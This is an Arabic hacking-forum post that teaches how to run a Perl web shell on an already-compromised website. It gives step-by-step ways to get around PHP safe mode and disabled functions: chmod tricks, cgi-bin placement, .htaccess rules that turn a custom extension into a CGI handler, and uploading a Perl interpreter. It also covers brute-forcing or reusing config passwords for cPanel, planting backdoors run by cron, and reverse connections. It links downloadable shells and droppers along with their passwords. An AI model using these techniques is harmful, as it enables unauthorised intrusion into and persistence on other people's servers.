حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركـآته

    [​IMG]

    أخوآني وأحبابي أعضاء بيت الهكرز

    في اول موضوع لي بهذا المنتدى العريق والراقي
    ساتكلم عـن طرق تشغيــل البيرل على السيرفر
    وساقوم فيه بطرح جميـع مآلدي من طرق بـ إذن الله
    وهي ليست من اكتشافي ..
    ولكنها مما تعلمته وجمعتـه و قمت بشرحه




    [​IMG]



    أولا: مآهو البيــرل - وماهي فائدته

    البيرل " Perl" عباره عن لغـه من لغات البرمجـه كـ php + python وغيرهـآ
    وكلمة perl إختصار لـ Practical Extraction and Report Language
    وتنتهـي الملفـآت المكتوبه بـ لغة البيرل بـ الامتدآد pl
    مثال "*****.pl"

    وفائدة البيرل بالنسبه للإختراق
    تكمن في رفعه على الموقع المخترق وتشغيله
    فـ إذا استطعت تشغيل البيرل تتخطى الحمايه وتستطيع تنفيذ اي أمر منه ..
    حتى لو كآن SAFE MODE:ON والدوآل محظوره


    [​IMG]




    نـأتي الآن الى طرق تشغيــل البيرل على السيرفر

    أولا :
    في حآلة كآن SAFE MODE : OFF
    والدوآل معطله ..

    [​IMG]

    اي انك تستطيع تنفيذ الأوامر من الشيل العادي

    قم برفع ملف البيرل مثلا اسمه "*****.pl" وأعطه تصريح 755
    عن طريق الامر التالي:

    كود PHP:
    chmod 755 *****.pl


    ثم قم بـ إستعراضه من المتصفح www.site.com/*****.pl

    وسوف يعمل بـ إذن الله



    [​IMG]



    نأتي الآن لطرق تشغيله في حآلة فعالية الوضع الامن SAFE MODE : ON
    كما نشاهد الصوره الان

    [​IMG]

    أي أنـك لاتستطيع تنفيذ أي أمر نهـآئيا

    هنـآك عدة حلول

    أولا:
    عن طريق دآلة chmod
    اذا لم تكون موجوده ضمن الدوال المحظوره " Disable functions "

    نقوم بعمل ملف نسميه مثلا "chmod.php"
    ونضع بدآخله الكود التـآلي

    كود PHP:


    مع تغيير *****.pl الى اسم اداة البيرل المرفوعه
    ونقوم برفع الملف بنفس مسار البيرل
    ثم نقوم باستعراض الملف chmod.php في المتصفح
    www.site.com/chmod.php

    اذا ظهرت لنا صفحه بيضاء عند استعراضه..
    فهذا دليل على نجاح العمليه
    نعود الى الشيل ونحدثه .. نجد ان ملف البيرل تم تصريحه 755 بنجاح
    ونقوم باستعراضه

    وهنـآك ايضا انوآع من الشيـلآت توجد فيها خاصية تعديل التصريح
    من ضمنها شيل milw0rm وغيره
    ضع مسار ملف البيرل وإسمه واعطه تصريح 755
    كما في الصوره

    [​IMG]


    وايضا جرب ترفع البيرل في مجلد cgi-bin اذا وجد ..
    وقم بتصريحه باحدى الطرق السابقه واستعراضه
    www.site.com/cgi-bin/*****.pl



    أيضا تستطيع تصريحه عن طريق الاتصال العكسي اذا استطعت الاتصال
    وهنـآك شيلات تستطيع عن طريقها الاتصال العكسي مثل r57 وغيره

    [​IMG]

    وسيتم باذن الله شرح جميع طرق الاتصال العكسي
    ولكن في موضوع منفصل .. حتى لانخرج عن موضوعنآ

    ~

    أحيانا عند تصريح البيرل واستعراضه .. يخرج لك على شكل نصي
    أي يعرض لك مصدر الملف ..
    وحل ذلك .. قم بفتح ملف البيرل وتعديله واستبدل
    كود PHP:
    #!/usr/bin/perl


    اللتي في اول سطر .. الى
    كود PHP:
    #!/usr/bin/perl -I/usr/local/bandmin


    واذا لم تنفع استبدلها الى
    كود PHP:
    #!/home/USER/public_html


    ضع مكآن USER يوزر موقعك ومسار الملف



    [​IMG]




    نـأتي الان لطريقة تصريح البيرل من السيبانل cpanel

    احيآنا لاتنفع الطرق السابقه وعليك بالحصول على سيبانل
    وللحصول على سيبانل
    قم بتجربة باسوورد كونفق الموقع المتواجد عليه ويوزر الموقع
    وحاول الدخول بهآ للوحه ..
    او قم بـجمع عدد من يوزرات السيرفر مع يوزر موقعك
    وخمن عليها بواسطة احد سكربتات التخمين ولستتة باسسوردات


    بعد الحصول على سيبانل ودخول اللوحه
    نذهب الى File Manager "مدير الملفات"

    [​IMG]

    ونذهب الى مجلد رئيسية الموقع " public_html "
    او اي مجلد عليها
    ونرفع ملف البيرل .. ونقوم باعطائه تصريحه 755 كما في الصوره

    [​IMG]

    وتستطيع ايضا عن طريق السي بانل رفع باك دور
    والاتصال به عكسيا عن طريق corn job
    وهذا سيتم شرحه في موضوع خاص بالاتصال العكسي


    [​IMG]




    تشغيل البيرل عن طريق تغيير امتدآده ~

    أي تشغيله بـ أي أمتداد آخر غير pl يصبح pp مثلا "perl.pp"

    نقوم الان بعمل مجلد جديد .. او ندخل مجلد اخر غير اللي عليه الشيل
    حتى لايقوم الـ هاتكسس بـ إفساد الشيل

    نقوم برفع ملف البيرل المغير امتداده "perl.pp"
    وملف الهاتكسس بمجلد وآحد

    ضع بملف الهاتكسس الكود التالي

    كود PHP:
    Options FollowSymLinks MultiViews Indexes ExecCGI

    AddType application
    /x-httpd-cgi .pp

    AddHandler cgi
    -script .pp
    AddHandler cgi
    -script .pp


    غير pp الى الامتداد اللى نفس امتداد البيرل المعدل اللي رفعته
    وقم باعطآء ملف البيرل "perl.pp" تصريح 755 باي طريقه من الطرق السابقه
    ثم قم باستعراضه من المتصفح .. مثال
    www.site.com/xxx/perl.pp
    غير xxx الى اسم المجلد اللي رفعت فيه



    [​IMG]



    او قم برفع الملف التالي
    xa7m3d.php
    لتحميل الملف من هنـآ
    http://www.gulfup.com/X98b2m8oizfggo0

    بعد ماتقوم برفع الملف xa7m3d.php
    قم بـ إستعراضه مثلا
    www.site.com/xa7m3d.php

    سوف يخرج لك صفحه بيضاء مكتوب فيها العباره التاليه

    كود PHP:
    Done .. You Will Find File As xa7m3d/xa7m3d.evil Open It And Password To Login : xa7m3d ### This Tool Coded By Xa7m3d


    يعني ان العمليه نجحت
    وهذا السكربت عندمآ تقوم بـمجرد إستعراضه
    يعمل لك مجلد بـ إسم xa7m3d
    ويضع فيه الأدوآت "الهاتكسس+شيل بيرل مغير امتدآده ومصرح جاهز"
    نخش على مجلد xa7m3d من المتصفح
    www.site.com/xa7m3d
    نجد شيل البيرل أمـآمنا بـ إسم xa7m3d.evil
    كما نرى في الصوره

    [​IMG]

    نقوم باستعراضه
    www.site.com/xa7m3d/xa7m3d.evil

    ونجد شيل البيرل أمآمنا
    ملاحضه .. بـآسوورد شيل البيرل : xa7m3d

    وعند رفعك لادوآت بيرل أخرى مثل ادوآت سحب الكونفج او اليوزرات
    ارفعها بنفس المجلد
    وغير امتدادها لنفس امتداد شل البيرل المعدل "evil" مثلا "config.evil"
    لكن قم بتصريحها اذا رفعتهـآِ .. ~



    [​IMG]




    تشغيـل البيرل عن طريق رفع مترجم للبيرل

    أولا قم بتحميل مترجم البيرل
    رفعته لكم هنا
    http://www.gulfup.com/X9ddxjdlcqosg0k

    نقوم بعمل مجلد جديد
    وان لم نستطع نذهب لأي مجلد فرعي اخر غير مجلد الشيل الرئيسي
    ونرفع فيه المترجم + شيل البيرل "مغير امتداده" + هاتكسس
    نعطي مترجم البيرل تصريح 755
    كود PHP:
    chmod 755 kh


    kh = اسم المترجم ~ أو نصرحه برفع ملف كما في بداية الموضوع
    اذا لم تكن دالة chmod محظوره
    ونصرح شيل البيرل ايضا نفس التصريح
    ويكون كود الهاتكسس كالتالي
    كود PHP:
    Options FollowSymLinks MultiViews Indexes ExecCGI

    AddType application
    /x-httpd-cgi .pp

    AddHandler cgi
    -script .pp
    AddHandler cgi
    -script .pp


    "pp" غيره لامتداد البيرل الذي رفعته
    وافتح شيل البيرل واحذف فيه السطر الاول
    كود PHP:
    #!/usr/bin/perl


    وضع مكانها
    كود PHP:
    #!kh -w


    يعني غيرنا مسار البيرل الاعتيادي في السيرفرات الى مترجمنا
    وبـ إذن الله يشتغل البيرل
    [​IMG]



    هذا كل مالدي حآليا ..
    وبـ إذن الله في قادم الايام سيتم التطرق لأمور أخرى

    [​IMG]

    البعض قد لايعرف كيف يتعامل مع شيل البيرل
    لانه مجرد سطر اوامر
    وللمعلوميه .. كل ماتفعله في الشيل العادي عباره عن اوامر
    نفذها في شيل البيرل .. لايوجد إختلاف سوى اختلاف بسيط
    بعض الاوامر المهمـه " المختلفه"

    امر دخول مجلد معين
    كود PHP:
    cd folder


    غير folder لاسم المجلد

    أمر الرجوع للمجلد السابق أو للخلف

    كود PHP:
    cd ../


    امر استعراض الملفات في المجلد المتواجد عليه

    كود PHP:
    ls


    امر استعراض الملفات وتصاريحها

    كود PHP:
    ls -la


    معلومات عن السيرفر

    كود PHP:
    uname -a


    قراة ملف معين مثلا "a.txt"

    كود PHP:
    cat a.txt



    حذف ملف معين مثلا "a.txt"

    كود PHP:
    rm a.txt


    أمر سحب ملف معين من موقع آخر مثلا "a.txt"

    كود PHP:
    wget http://www.site.com/a.txt


    قم بالبحث عن أوامر الليونكس وأستعملها
    ونصيحه أبعد عن " النسخ واللصق "
    حتى تحفظ الاوامر مع الايام ومع التطبيق المتكرر

    لتحميل شيل البيرل من هنـآ
    http://www.gulfup.com/X9dc2m11o5r0g80
    باسسورد الشيل v-3


    [​IMG]

    تــم الكلام وربنـآ المحمود .. وله المكآرم والعـلآ والجود

    ~

    ولا اسمح من يقوم بنقله حرفيا بالكامل إلآ بذكر الحقوق

    أخوكم virus-3sir

    في أمـآن الله
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة